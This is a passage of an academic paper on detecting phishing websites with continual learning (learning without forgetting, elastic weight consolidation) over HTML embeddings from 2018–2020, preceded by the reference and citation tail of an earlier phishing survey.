Zhang, Y., Hong, J. I., and Cranor, L. F. (2007). “Cantina,” in Proceedings of the 16th international conference on World Wide Web - WWW ’07 (New York, NY: ACM Press ), 639. doi:10.1145/1242572.1242659

Zissis, D., and Lekkas, D. (2012). Addressing cloud computing security issues. Future Generat. Comput. Syst. 28, 583–592. doi:10.1016/j.future.2010.12.006

Keywords: phishing anatomy, precautionary countermeasures, phishing targets, phishing attack mediums, phishing attacks, attack phases, phishing techniques

Citation: Alkhalil Z, Hewage C, Nawaf L and Khan I (2021) Phishing Attacks: A Recent Comprehensive Study and a New Anatomy. Front. Comput. Sci. 3:563060. doi: 10.3389/fcomp.2021.563060

Received: 17 May 2020; Accepted: 18 January 2021; Published: 09 March 2021.

Copyright © 2021 Alkhalil, Hewage, Nawaf and Khan. This is an open-access article distributed under the terms of the Creative Commons Attribution License (CC BY). The use, distribution or reproduction in other forums is permitted, provided the original author(s) and the copyright owner(s) are credited and that the original publication in this journal is cited, in accordance with accepted academic practice. No use, distribution or reproduction is permitted which does not comply with these terms.

*Correspondence: Chaminda Hewage, [email protected]

Disclaimer: All claims expressed in this article are solely those of the authors and do not necessarily represent those of their affiliated organizations, or those of the publisher, the editors and the reviewers. Any product that may be evaluated in this article or claim that may be made by its manufacturer is not guaranteed or endorsed by the publisher.

Open access
Published: 17 July 2023

Life-long phishing attack detection using continual learning

Asif Ejaz 1 ,
Adnan Noor Mian 1 &
Sanaullah Manzoor 1

Scientific Reports volume 13 , Article number: 11488 ( 2023 ) Cite this article

Computer science
Mathematics and computing

Phishing is a form of identity theft that employs social engineering methods to obtain confidential data from unwary users. A phisher frequently attempts to trick the victim into clicking a URL that leads to a malicious website. Many phishing attack victims lose their credentials and digital assets daily. This study demonstrates how the performance of traditional machine learning (ML)-based phishing detection models deteriorates over time. This failure is due to drastic changes in feature distributions caused by new phishing techniques and technological evolution. This paper explores continual learning (CL) techniques for sustaining phishing detection performance over time. To demonstrate this behavior, we collect phishing and benign samples for three consecutive years, from 2018 to 2020, and divide them into six datasets to evaluate traditional ML and the proposed CL algorithms. We train a vanilla neural network (VNN) model in the CL fashion using deep feature embedding of HTML contents. We compare the proposed CL algorithms with the VNN model trained from scratch and with transfer learning (TL). We show that CL algorithms maintain accuracy over time with a tolerable deterioration of 2.45%. In contrast, the performance of VNN and TL-based models deteriorates by over 20.65% and 8%, respectively.

Introduction

Phishing is a technique in which a cyber-criminal (also known as an attacker) clones a website’s interface and sends a compelling message to a naive user, through an email or social media chat, urging them to open the link in that message. When the user opens the link, a cloned interface that resembles the original is displayed. Any username and password entered in this interface are sent to the attacker, who can then exploit them. The number of phishing attacks is increasing. According to the anti-phishing working group (APWG), 316,747 phishing attacks were reported in December 2021, which was the highest monthly total in APWG’s history 1 .

Phishing attacks have become a serious threat and need to be detected on the fly, before the user is trapped. Over the years, phishing attacks have matured by using advanced phishing methods and web development technology to become less prone to detection 2 , and they continuously evolve and adapt to evade current intrusion detection and intrusion prevention systems. Generally, phishing detection systems can be classified into two groups, i.e., rule-based and ML-based 3 . Rule-based phishing detection systems blacklist malicious domains and URLs 4 . Manual effort is required to add new domains and websites. Such systems cannot detect a first-time attack (zero-day attack). They also cannot detect false positive incidents (samples that are normal but that the system has predicted as malicious) caused by human error in labeling 2 . ML-based techniques, on the other hand, use historical data on phishing pages to find patterns in webpage content 5 , 6 , 7 , 8 and URLs 4 , 9 , 10 . ML-based methods are now the state of the art in phishing detection, as they perform better than rule-based detection systems 4 , 11 , 12 . Although ML-based methods are effective, these systems are trained on historical datasets and therefore fail to detect sophisticated, newly crafted phishing samples once the feature distribution changes. Regular model retraining or TL on the new samples mitigates this issue but degrades detection performance on older samples. To tackle this problem, we adopt CL-based algorithms to maintain detection performance on both old and new phishing attacks. In TL, the last few layers of an existing model are retrained to adapt it to a new dataset, while in CL, a model is retrained to adapt to new data while maintaining performance on previous data. We discuss the details of these methods in Section “ Methodology ”.
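The zero-day limitation of rule-based systems described above can be illustrated with a minimal sketch. The blacklist entries, URLs, and the function name `is_blacklisted` are hypothetical and invented for illustration; this is not the detection logic of any particular system cited here.

```python
from urllib.parse import urlsplit

# Hypothetical blacklist entries, invented for illustration only.
BLACKLISTED_DOMAINS = {"login-paypa1.example", "secure-bank.example"}


def is_blacklisted(url: str) -> bool:
    """Return True if the URL's host appears on the blacklist."""
    host = (urlsplit(url).hostname or "").lower()
    return host in BLACKLISTED_DOMAINS


# A previously reported phishing URL is caught ...
known = "http://login-paypa1.example/signin"
# ... but a freshly registered look-alike domain is not.
zero_day = "http://login-paypa2.example/signin"

print(is_blacklisted(known))
print(is_blacklisted(zero_day))
```

Until someone manually adds the second domain to the list, the lookup has no basis for flagging it, which is the gap that learned detectors aim to close.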

The specific contributions of this study are: (i) we identify performance deterioration over time in traditional ML systems for phishing detection due to excessive changes in feature distribution and the evolution of web development technologies, (ii) we propose a CL-based phishing detection framework to cope with performance drop issues in traditional ML models and show that the approach improves learning performance with limited training data and requires less retraining time.

The rest of the paper is organized as follows. We provide related work in Section “ Related Work ”. We define research tools and methods in Section “ Research tools and methods ”. We present our methodology in Section “ Methodology ”. We describe experiments and results in Section “ Performance comparison of continual learning ”. We perform analysis in Section “ Discussions ”. Finally, we conclude in Section “ Conclusion and future work ”.

Related Work

As phishing attacks grow, researchers are working to provide reliable and resilient solutions for detecting them automatically. Current ML-based phishing detection techniques are classified by the features used for detection, i.e., URL features, content features, and visual and hybrid features. These detection techniques are discussed in the following subsections.

URL features based detection

Phishing detection using URLs is effective for offline training data. A few studies 4 , 7 , 13 have identified and extracted hand-crafted features from URLs and used these features alone or in combination with content-based features to train ML models. They used support vector machine (SVM), decision tree (DT), and random forest (RF) models and achieved more than 95% accuracy. Recent studies 14 , 15 , 16 , 17 , 18 have used deep learning-based methods such as convolutional neural networks (CNN) and generative adversarial networks (GAN). URLs are generated through the GAN model to solve the data bias problem caused by the imbalance in phishing datasets. This method achieved an accuracy of 95.6%. Wei et al. 15 proposed a novel multi-spatial character-level CNN model that is applied to URLs for fast and accurate phishing detection. Patil et al. 16 reviewed URL-based techniques and developed a model to overcome the bias issues found in previous works. Sherazi et al. 10 observed that the full URL is not the best basis for detecting a phishing website. Their proposed system uses only domain names, as phishers can control the URL but cannot change the domain name. They developed a faster and unbiased system with only seven features and an accuracy of 97–99.7%. Tian et al. 2 highlight that URL-based detection methods have limitations: particular domain names, such as internationalized domain names, allow attackers to register domains that resemble well-known domains by using characters from local languages. Furthermore, all of these URL-based detection methods fail to detect advanced phishing techniques because they do not use webpage content features.
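To make the notion of hand-crafted URL features concrete, the following is a minimal sketch of a lexical feature extractor. The specific features and the function name `url_features` are illustrative assumptions; they are not the feature sets used in the cited studies.

```python
import re
from urllib.parse import urlsplit


def url_features(url: str) -> dict:
    """Extract a few simple lexical features from a URL (illustrative set)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    return {
        "url_length": len(url),
        "num_dots_in_host": host.count("."),
        "num_hyphens_in_host": host.count("-"),
        "has_at_symbol": "@" in url,
        # A raw IPv4 address in place of a domain name is a common warning sign.
        "host_is_ipv4": bool(re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host)),
        "uses_https": parts.scheme == "https",
    }


features = url_features("http://192.168.0.1/secure-login/index.html")
for name, value in features.items():
    print(name, value)
```

A dictionary like this would typically be converted to a numeric vector and passed to a classifier such as SVM, DT, or RF.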

Content based detection

Recent studies used particular keywords from webpage content as discriminative features for more robust phishing detection. Some researchers have employed ML algorithms to tackle the phishing detection problem and achieved promising results 6 , 8 , 11 , 19 , 20 , 21 , 22 , 23 , 24 . Advancements in both feature extraction and detection models have been made in these studies, for instance, content-based features extracted with NLP and reinforcement learning, ensembles and bagging for training, and others. Many recent studies used NLP-based feature extraction on email manuscripts and trained the ML models 6 , 19 , 23 , 25 . These studies proved the success of the NLP-based features in detecting phishing emails with an accuracy of 98.2%. Smadi et al. 11 used reinforcement learning and extracted four features, including embedded URLs, HTML content, email header, and email manuscript features. With a dataset of approximately ten thousand data samples, they obtained 98.6% detection accuracy. Ubing et al. 20 used RF to extract features, and the nine best content-based features out of 30 were selected and were used to train ensemble classifiers. Their ML system used a majority voting method to avoid model overfitting and achieved 95% accuracy.
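Majority voting, as mentioned for ensemble classifiers above, can be sketched in a few lines. The labels and the function name `majority_vote` are hypothetical; the sketch assumes an odd number of voters so that binary ties cannot occur.

```python
from collections import Counter


def majority_vote(predictions):
    """Return the label predicted by the largest number of classifiers."""
    return Counter(predictions).most_common(1)[0][0]


# Hypothetical outputs of three independently trained classifiers
# for the same web page.
votes = ["phishing", "benign", "phishing"]
print(majority_vote(votes))
```

Because a single classifier's mistake is outvoted by the others, the combined decision tends to be less sensitive to the quirks of any one model.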

Zamir et al. 21 introduced a new approach using multiple ML algorithms. They used an ensemble of RF, neural networks (NN), and Bagging to achieve 97.4% accuracy in detecting phishing web pages. Their study shows that ensemble techniques are among the best strategies for detecting phishing web pages. Niakanlahiji et al. 22 crafted many features from HTML content, code complexity, and certificate features to devise a target-independent detection method. As a result, they achieved 95.4% accuracy with RF. Zheng et al. 26 use feature embedding and NN to detect phishing pages. They also combine character-level information with word-level information while embedding features. Their results are quite promising, with an accuracy of 98.30%, a true positive rate of 99.18%, and a true negative rate of 94.34%.

Liu et al. 27 designed a multistage model that applies initial filters, such as the number of page views, to detect phishing pages. Moreover, they proposed a framework called CASE for extensive feature extraction. Their proposed multistage model with the CASE framework achieved a recall of 0.9436, a precision of 0.9892, and an F1 measure of 0.9659. Tan et al. 28 proposed a new detection technique based on graph theory. They used the hyperlinks on the page to create graph features that represent deeper information between features. Their experimental results showed an accuracy of 97.8%. Yi et al. 24 presented two types of web phishing detection features, original and interaction features, and then used deep belief networks. This model achieved around a 90% true positive rate and a 0.6% false positive rate.
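As a quick consistency check on the figures reported for the multistage model, the F1 measure is the harmonic mean of precision and recall, F1 = 2PR / (P + R). The short sketch below recomputes it from the quoted precision and recall; the function name `f1_score` is just an illustrative helper.

```python
def f1_score(precision: float, recall: float) -> float:
    """Harmonic mean of precision and recall."""
    return 2 * precision * recall / (precision + recall)


# Precision and recall as quoted in the text for the multistage model.
f1 = f1_score(precision=0.9892, recall=0.9436)
print(round(f1, 4))
```

The recomputed value agrees with the reported F1 measure of 0.9659 to four decimal places.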

Some studies used feature selection methods to improve accuracy. For instance, Chiew et al. 29 proposed a new feature selection technique called the hybrid ensemble feature selection. It consists of two phases that produce a set of baseline features. The hybrid ensemble feature selection shows the best results when used with the RF classifier, which achieves an accuracy of 94.6% with only 20.8% of the features used originally.

All content-based techniques rely on content-specific features. These techniques are robust to some extent but cannot capture advanced evasion techniques. When attackers use code obfuscation, hand-crafted, content-based features are no longer helpful for phishing page detection. Furthermore, these techniques require time to process website content at runtime. So, there is a need for fast and efficient detection methods that use a deep vector embedding representation of content and are resilient to such evasion.

Visual and hybrid features based detection

Some recent works used visual-based features combined with text features to improve phishing detection. Visual features are computed with the cosine similarity of the phishing page with the corresponding legitimate page 8 , 12 , 17 , 30 , 31 , 32 . Rao et al. 12 have used a hybrid detection approach that employs both ML-based and visual similarity-based detection. This detection mechanism requires a vast image database to compare phishing web pages. They achieved 99.55% accuracy using HTML content-based features, URL-based features, and some third-party features. However, third-party features (online features) are costly and slow, making this approach impractical for real-time deployment.
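The cosine similarity mentioned above can be illustrated with a minimal sketch. The feature vectors below are hypothetical stand-ins for visual descriptors of two pages; the cited works may compute their visual features differently.

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length feature vectors."""
    if len(a) != len(b):
        raise ValueError("vectors must have the same length")
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0  # convention chosen here for an all-zero vector
    return dot / (norm_a * norm_b)

# Hypothetical visual descriptors (for example, colour histograms) of two pages.
legit_page = [0.2, 0.5, 0.3]
suspect_page = [0.4, 1.0, 0.6]  # same direction, different scale

# A value close to 1 means the suspect page looks like the legitimate one.
print(cosine_similarity(legit_page, suspect_page))
```

Because cosine similarity ignores vector magnitude, a page that reuses the same layout at a different scale still scores as highly similar.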

Tian et al. 2 identified squatting domain classes, obfuscation techniques, and essential features for robust learning. They extracted keywords from visual screenshots of pages using optical character recognition (OCR). They also converted code to vectors using feature embeddings to develop a robust detection model. They achieved 97% accuracy with RF, which is better than Naive Bayes and KNN. On the other hand, Chiew et al. 29 used the website’s logo to detect phishing websites by applying a two-stage method. The first stage extracts the logo from the website and uses Google image search to find the domain name corresponding to the extracted logo. The second stage compares the domain of the query website with the retrieved domain and classifies the website accordingly.

The visual and hybrid feature-based techniques are fairly robust in phishing detection. However, these techniques increase the computational complexity of the model and the time needed to extract all features at runtime. Moreover, the existing literature on phishing detection has yet to consider the performance deterioration of ML-based systems over time. Thus, we need an efficient, robust, and adaptive model that solves the problems of existing work.

To the best of our knowledge, prior research has exclusively employed traditional vanilla neural networks (VNNs), which cannot address novel phishing techniques until they are trained or fine-tuned on newly acquired data. These methods may also suffer performance drops when deployed in scenarios where phishing attacks change rapidly. Life-long phishing detectors are therefore useful in scenarios where retaining all previous data is costly and phishing attacks evolve continuously, and they can also be deployed to detect zero-day attacks. Continual learning (CL) algorithms are generally used in computer vision to retrain existing models to adopt new tasks without forgetting knowledge of prior tasks. We have applied CL algorithms such as learning without forgetting (LWF) 33 and elastic weight consolidation (EWC) 34 to reduce the systematic performance drop in phishing detection models. LWF is a technique that enables an ML model to learn new tasks without forgetting previously learned knowledge. EWC is a method that selectively protects the important weights of a neural network to prevent catastrophic forgetting.

Research tools and methods

In this section, we briefly describe different embedding methods and TL techniques.

Embedding Techniques in ML

There is a range of NLP embedding models with different sizes and capabilities. The specific task requirements and the available computation resources influence the selection of an embedding model. Some well-known embedding models are Word2Vec, GloVe, FastText, ELMo, and BERT, which are briefly described as follows.

Mikolov et al. 35 proposed a model called Word2Vec, which is trained on Wikipedia pages, and it effectively learns the semantic relationships between words. It has two variants: a continuous bag of words (CBOW) and a skip-gram. The CBOW model predicts a target word based on its context, while the Skip-gram model predicts the context words based on a target word. Word2Vec embeddings have sizes in the range of 100–300.
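The difference between the two variants is easiest to see in the training examples each one generates. The following is a minimal sketch, not the Word2Vec implementation itself; the helper names, the window size, and the example sentence are illustrative assumptions.

```python
def context_windows(tokens, window=2):
    """Yield (target, context_words) for each position in the sentence."""
    for i, target in enumerate(tokens):
        left = tokens[max(0, i - window):i]
        right = tokens[i + 1:i + 1 + window]
        yield target, left + right

def cbow_examples(tokens, window=2):
    """CBOW: the context words are the input, the target word is the label."""
    return [(context, target)
            for target, context in context_windows(tokens, window)]

def skipgram_examples(tokens, window=2):
    """Skip-gram: the target word is the input, each context word is a label."""
    return [(target, c)
            for target, context in context_windows(tokens, window)
            for c in context]

sentence = "verify your account now".split()
for context, target in cbow_examples(sentence, window=1):
    print("CBOW      ", context, "->", target)
for target, context_word in skipgram_examples(sentence, window=1):
    print("Skip-gram ", target, "->", context_word)
```

CBOW produces one example per position, while skip-gram produces one example per (target, context word) pair, which is why skip-gram sees more training signal for rare words.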

Pennington et al. 36 introduced global vectors for word representation (GloVe). GloVe is another widely used word embedding technique that is trained on large co-occurrence matrices of words to generate embeddings that capture both syntactic and semantic relationships between words. GloVe embeddings have sizes from 100 to 300 and are known for their effectiveness in capturing global word co-occurrence patterns. However, they may not perform well on out-of-vocabulary words.

Bojanowski et al. 37 presented a method called FastText, which is based on the Word2Vec model but also incorporates subword information. It breaks down each word into smaller character-based n-grams and learns embeddings for each n-gram along with the complete word. This allows FastText to capture morphological information and handle rare and out-of-vocabulary words better than other embedding techniques. FastText embeddings typically have sizes in the range of 100–300.
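The subword decomposition can be sketched in a few lines. This is an illustrative re-implementation, not the FastText library code; it assumes the boundary markers `<` and `>` and the n-gram range of 3 to 6 described in the FastText paper, and the function name is hypothetical.

```python
def char_ngrams(word, n_min=3, n_max=6):
    """Return the character n-grams of a word wrapped in boundary markers."""
    wrapped = f"<{word}>"  # markers distinguish prefixes and suffixes
    grams = []
    for n in range(n_min, n_max + 1):
        for i in range(len(wrapped) - n + 1):
            grams.append(wrapped[i:i + n])
    return grams

# An unseen, obfuscated token still shares n-grams with a known word.
known = set(char_ngrams("login"))
unseen = set(char_ngrams("loginn"))
print(sorted(known & unseen))
```

Because an out-of-vocabulary token overlaps with known words at the n-gram level, its vector can be composed from n-gram vectors learned during training.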

Devlin et al. 38 designed bidirectional encoder representations from transformers (BERT), a state-of-the-art word embedding technique that uses a transformer model to generate contextualized word embeddings. It is trained on large amounts of text data in an unsupervised manner to generate embeddings that capture the meaning of words in context. BERT embeddings are typically of size in the range of 768–1024, and they are known for their effectiveness in learning complex NLP tasks such as question-answering, etc.

Cer et al. 39 suggested a method called embeddings from language models (ELMo), which is a contextualized word embedding technique that generates embeddings based on the entire sentence context. It uses a bidirectional LSTM neural network to generate embeddings that capture the meaning of words in context. ELMo embedding vectors are 1024-dimensional and are known for their effectiveness in capturing complex relationships between words and handling polysemy. However, they can be computationally expensive to train and require a large amount of training data.

After studying these embedding techniques from the literature, we found FastText suitable because it offers a good balance between embedding size and vector quality, making it a popular choice for many NLP tasks. Also, FastText is trained on a Common Crawl dataset consisting of web pages, which is related to our problem. Word2Vec and GloVe are small and used for non-complex tasks, while ELMo and BERT are very complex models used for complex tasks.

TL Techniques

TL is an ML technique that involves taking knowledge learned from one task and applying it to a new problem. A few TL-based techniques are: (i) fine-tuning, (ii) CL, (iii) domain adaptation (DA), (iv) progressive neural networks (PNNs), and (v) multi-task learning. These techniques are briefly explained as follows.

Fine-tuning involves taking a pre-trained model and adjusting it to perform a new task. The pre-trained model is usually trained on a large dataset, and the fine-tuning process involves training the model on a smaller, task-specific dataset. During fine-tuning, the weights of the pre-trained model are adjusted to better fit the new dataset while retaining the learned features from the original dataset. This process can significantly reduce the training time and computational resources required to train a new model from scratch 40 .

Lange et al. 41 proposed a method called CL that adapts to new information over time. The main objective of CL is to develop models to learn and retain new information without forgetting the previously learned knowledge. CL is critical in real-world applications where data is constantly changing or evolving. Various CL algorithms, such as regularization, LWF, EWC, etc., are used to improve the ML models continuously over time.

In multi-task learning, multiple tasks are learned in parallel to generalize the ML model, so data for all tasks must be available before training. In life-long learning scenarios, by contrast, the model can be adapted to a new task at any time using only the newly available data 42 .

Rusu et al. 43 introduced PNNs, which consist of a series of neural networks, each specialized in performing a specific task. Each network is trained on its specific task and can be used independently to make predictions. When a new task is introduced, a new network is added to the series, but the previously learned networks are frozen and kept unchanged. PNNs require a careful design of the network architecture and the training procedure to ensure that the added columns of neurons do not interfere with the existing knowledge. PNN is challenging to implement and optimize because it is computationally expensive, hence, infeasible for life-long learning.

In DA, an ML model previously trained on a source domain is adapted to a target domain, where the output is the same for both domains but the input data distribution is entirely different. DA requires data from both domains, which increases training complexity, storage, and computation cost, and it may suffer catastrophic forgetting as the number of retraining iterations increases. Hence, it is infeasible for life-long learning 44 .

After studying different TL techniques, we selected the fine-tuning and CL-based algorithms as they require less retraining time and have low computation costs.

Methodology

This section covers a detailed discussion of our methodology to identify and mitigate the performance drop. We analyzed our dataset features using a low-dimensional principal component analysis (PCA) embedding of samples to visualize the difference in distribution. We transformed the features into 1-D and 2-D PCA representations, as shown in Figs. 1 and 2 , respectively. Figure 1 shows the 1-D PCA feature distribution for data samples taken from three consecutive years; the x-axis represents the 1-D feature values, while the y-axis represents the frequency of samples. It depicts the change in the distribution of features from one year to the next. Similarly, we analyzed 2-D PCA features in Fig. 2 . Figure 2 a shows the scatter graph for all normal samples, Fig. 2 b shows the distribution of all phishing samples, and Fig. 2 c shows the distribution of all phishing and normal samples collected in the three consecutive years. These results show that the feature distribution shifts over the years, which implies that a model trained on historical data cannot perform consistently well on data from subsequent years. Therefore, a solution is required to cope with this changing data distribution.

Distributions shift in one-dimensional PCA representation for three years data.

Distributions shift in two-dimensional PCA representation for three years data.

To the best of our knowledge, there is no standard dataset for phishing samples. We, therefore, collected phishing samples that are reported on community platforms (like VirusTotal 45 and PhishTank 46 ). The dataset contains extensive samples for training ML models across subsequent years to understand the performance drop over time. The dataset contains two types of web pages, i.e., phishing and benign. Their details are as follows.

Phishing samples This set contains around 90k HTML web page samples that were submitted to well-known community websites (PhishTank and VirusTotal) as malicious pages. It contains only samples that were active during the three consecutive years 2018–2020 and were marked as phishing by more than ten reputable antivirus vendors on VirusTotal.

Benign samples This dataset contains around 80k HTML web pages submitted on VirusTotal in the same three years and not marked as phishing or malicious by more than 3 Antivirus vendors. We use a low threshold for Antivirus (AV) detection because some AV vendors are known to be highly sensitive, and they sometimes detect unknown or non-famous benign websites as phishing. Due to this high sensitivity of phishing detection of AV vendors, any web page with three or fewer phishing detections is considered a benign sample. Table 1 shows the number of samples per year.
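The two labeling thresholds described above can be summarized in a short sketch. The function name and constants are hypothetical, and the treatment of pages with four to ten detections is an assumption, since the text does not say how such pages are handled.

```python
PHISHING_MIN_DETECTIONS = 11  # "more than ten" vendors flag the page
BENIGN_MAX_DETECTIONS = 3     # "three or fewer" phishing detections

def label_sample(phishing_detections):
    """Map the number of antivirus phishing detections to a dataset label."""
    if phishing_detections < 0:
        raise ValueError("detection count cannot be negative")
    if phishing_detections >= PHISHING_MIN_DETECTIONS:
        return "phishing"
    if phishing_detections <= BENIGN_MAX_DETECTIONS:
        return "benign"
    # Assumption: ambiguous pages (4 to 10 detections) are left out.
    return None

for count in (0, 3, 7, 11, 40):
    print(count, label_sample(count))
```

Leaving a gap between the two thresholds keeps ambiguous pages out of both classes, which reduces label noise at the cost of discarding some samples.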

We performed training and testing experiments with six datasets to show the performance drop. We split the dataset of each of the three consecutive years (2018 to 2020) into two halves of equal size. The resulting datasets are named 2018A, 2018B, 2019A, 2019B, 2020A, and 2020B.

Data pre-processing and features extraction

First, as a pre-processing step, we excluded anomalous website samples, such as pages with very little HTML content. In the next step, we analyzed dataset features for ML model training. Many hand-crafted features proposed in recent studies are helpful in phishing detection with ML 13 , 20 , 21 . However, such features would need to be far more exhaustive to detect advanced phishing attacks, as websites evolve continuously. To address this issue, we employ a deep feature representation of the full HTML content (code and text) using vector embedding. A vector embedding contains compressed and important information that an NN can easily use to learn non-linear functions. We used a very powerful embedding model called “FastText” 37 , which is trained on Wikipedia pages. FastText produces an embedding of dimension 300, which is a good balance between vector quality and model complexity.

Experiments and results

To evaluate the performance of the proposed CL-based phishing attack detection system, we performed experiments on VNN, TL, and CL models. For the CL experiments, we used two deep-learning techniques, LWF (a technique that enables an ML model to learn new tasks without forgetting previously learned knowledge) and EWC (a method that selectively reinforces the necessary weights of a NN to prevent catastrophic forgetting). In this section, we cover the details of the experiments and results. For each model, we trained six VNN models, each using a dataset, and then tested the trained model on all the datasets from 2018A to 2020B to compare their accuracy. The training, validation, and testing ratio is 80, 10, and 10 percent, respectively. Table 2 mentions the hyper-parameters used in all experiments. Moreover, the configuration we used for TL and CL experiments is the same as that of VNN experiments.
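The data preparation described so far (two halves per year, then an 80/10/10 split) can be sketched as follows. Whether the halves were cut randomly or chronologically is not stated, so the random shuffle, the seed, and the function names here are assumptions.

```python
import random

def split_year(samples, seed=0):
    """Shuffle one year's samples and cut them into halves A and B."""
    shuffled = list(samples)
    random.Random(seed).shuffle(shuffled)  # seeded for reproducibility
    half = len(shuffled) // 2
    return shuffled[:half], shuffled[half:]

def train_val_test(samples, train_pct=80, val_pct=10):
    """Split a dataset into training, validation, and test portions."""
    n = len(samples)
    n_train = n * train_pct // 100
    n_val = n * val_pct // 100
    return (samples[:n_train],
            samples[n_train:n_train + n_val],
            samples[n_train + n_val:])

# Placeholder sample IDs standing in for one year's web pages.
year_2018 = [f"page_{i}" for i in range(1000)]
set_2018a, set_2018b = split_year(year_2018)
train, val, test = train_val_test(set_2018a)
print(len(set_2018a), len(set_2018b), len(train), len(val), len(test))
```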

Experiments with VNN

VNN architecture.

A VNN consists of an input layer, one or more hidden layers, and an output layer. Each layer comprises multiple neurons, where each neuron performs a weighted sum of its inputs, adds a bias term, and passes the result through a non-linear activation function such as ReLU, tanh, or sigmoid. Then, this result is passed to the subsequent layers. At the output layer, the error between the actual and predicted output is computed using a loss function, such as cross-entropy loss. This loss is minimized by using optimizers like SGD or Adam and backpropagated to the network by computing gradients at each layer.

Figure 3 shows the architecture of the VNN model that we used in our experiments. The input layer takes a 300-dimensional feature vector. There are four hidden layers with 256, 128, 64, and 32 neurons, respectively. Sigmoid activation and a dropout of 20% are used after each hidden layer. We used the binary cross-entropy loss function with the Adam optimizer for the binary classification task (phishing vs. benign).
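To make the layer sizes concrete, the following dependency-free sketch runs a forward pass through a network of this shape and counts its parameters. It is illustrative only: the single sigmoid output unit and the weight initialization are assumptions, and dropout is omitted because it is active only during training.

```python
import math
import random

# 300-d input, four hidden layers, and an assumed single output unit.
LAYER_SIZES = [300, 256, 128, 64, 32, 1]

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def init_params(sizes, seed=0):
    """Create one (weights, biases) pair per layer with small random weights."""
    rng = random.Random(seed)
    params = []
    for n_in, n_out in zip(sizes, sizes[1:]):
        weights = [[rng.uniform(-0.1, 0.1) for _ in range(n_in)]
                   for _ in range(n_out)]
        biases = [0.0] * n_out
        params.append((weights, biases))
    return params

def forward(params, x):
    """Weighted sum plus bias, then sigmoid, layer by layer."""
    activation = x
    for weights, biases in params:
        activation = [
            sigmoid(sum(w * a for w, a in zip(row, activation)) + b)
            for row, b in zip(weights, biases)
        ]
    return activation[0]  # probability-like score for the phishing class

def count_parameters(params):
    return sum(len(w) * len(w[0]) + len(b) for w, b in params)

params = init_params(LAYER_SIZES)
embedding = [0.5] * 300  # placeholder for a 300-d page embedding
print(forward(params, embedding), count_parameters(params))
```

Under these assumptions the network has 120,321 trainable parameters, most of them in the first hidden layer, so the model is small enough to retrain frequently.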

Figure 4 a–f shows a comparison of six experiments with VNN. Each experiment uses one training set at a time and is tested on all datasets. The experiments show that VNN gives high accuracy on the dataset used for training and lower accuracy on the other datasets. It is clear from the results that VNN performs well only on the dataset it was trained on and loses accuracy on the others; for example, Fig. 4 f shows that the VNN trained on 2020B achieves 96% on 2020B, while the same model achieves less than 90% on the earlier datasets. In each experiment, the results achieved on the current dataset (the one used to train the model) are the best in terms of accuracy, so we use them as the benchmark against which to compare the TL and CL accuracies.

VNN achieves high testing accuracy only on the current dataset and does not perform well on the remaining datasets.

Experiments with TL

TL is a well-known technique in deep learning where we fine-tune a pre-trained model (one that is already well trained on a relevant problem) for a new task 28 . We retrain only the last few layers of the network and freeze the initial layers to reuse the generic features learned by these layers, as depicted in Fig. 5 . This training regime reduces model convergence time, saves computation resources, and helps to learn from small datasets. However, in TL, the model works well only on new data and forgets the knowledge of old data. In our experiment, we fine-tuned the last two layers of the VNN architecture, as shown in Fig. 5 . The pre-trained VNN model is trained on the first chunk, 2018A, and tested on all other datasets. Then, the model is fine-tuned on the second dataset, 2018B, and so on, until it is fine-tuned on 2020B. We observed that the more a model is retrained, the more its performance on the previous datasets decreases.
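The freezing scheme can be sketched as a gradient step that skips frozen layers. This is a simplified illustration using plain SGD on flat weight lists rather than the Adam optimizer used in the experiments; the helper names are hypothetical, and which two layers count as "the last two" is an assumption.

```python
def freeze_all_but_last(n_layers, n_trainable=2):
    """Return a per-layer flag: True only for the last n_trainable layers."""
    return [i >= n_layers - n_trainable for i in range(n_layers)]

def sgd_step(layers, grads, trainable, lr=0.01):
    """Apply one SGD update, leaving frozen layers unchanged."""
    updated = []
    for weights, layer_grads, is_trainable in zip(layers, grads, trainable):
        if is_trainable:
            updated.append([w - lr * g for w, g in zip(weights, layer_grads)])
        else:
            updated.append(list(weights))  # frozen: copy weights as-is
    return updated

# Five layers (four hidden plus output), each reduced to one toy weight.
layers = [[1.0], [1.0], [1.0], [1.0], [1.0]]
grads = [[1.0], [1.0], [1.0], [1.0], [1.0]]
mask = freeze_all_but_last(len(layers))
print(mask)
print(sgd_step(layers, grads, mask, lr=0.1))
```

Only the unfrozen layers move toward the new dataset, which is what makes fine-tuning cheap but also lets those layers drift away from what earlier datasets required.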

TL block diagram where red color shows fine-tuned layers.

Figure 6 shows the accuracy results using TL. TL improves accuracy on each new task when the model is retrained on it. However, it is not a practical solution to this problem because it also deteriorates performance on the old tasks. Each experiment in Fig. 6 a–f represents the cumulative retraining applied to the 2018A model. For example, experiment two in Fig. 6 b shows that when the 2018A model is retrained with the new dataset 2018B, it achieves 95% accuracy on 2018B but its accuracy on the old task 2018A drops from 95% to 93%. Similarly, Fig. 6 c shows that retraining the recently fine-tuned model on 2019A achieves 95% accuracy on it but reduces accuracy on both old datasets, 2018A and 2018B. Finally, Fig. 6 f shows that accuracy on 2018A drops to 87% after retraining on five subsequent tasks, while the model achieves high accuracy on 2020B. Forgetting previous tasks as training moves forward is an inherent drawback of TL.

TL gradually decreases accuracy on previous datasets as the number of retraining tasks increases.

Experiments with CL: learning without forgetting

CL is a training paradigm that allows the model to continuously adapt and learn new tasks without losing knowledge of the old ones, even without access to old data. Unlike TL, in which the model only works with new data, the CL technique is designed to work on both old and new data. Using the model trained on the old tasks, we apply CL incrementally to make it work on the dataset belonging to subsequent years. We used two state-of-the-art CL techniques known as learning without forgetting (LWF) 33 , discussed below, and elastic weight consolidation (EWC) 34 , discussed in the following subsection.

Learning without forgetting architecture.

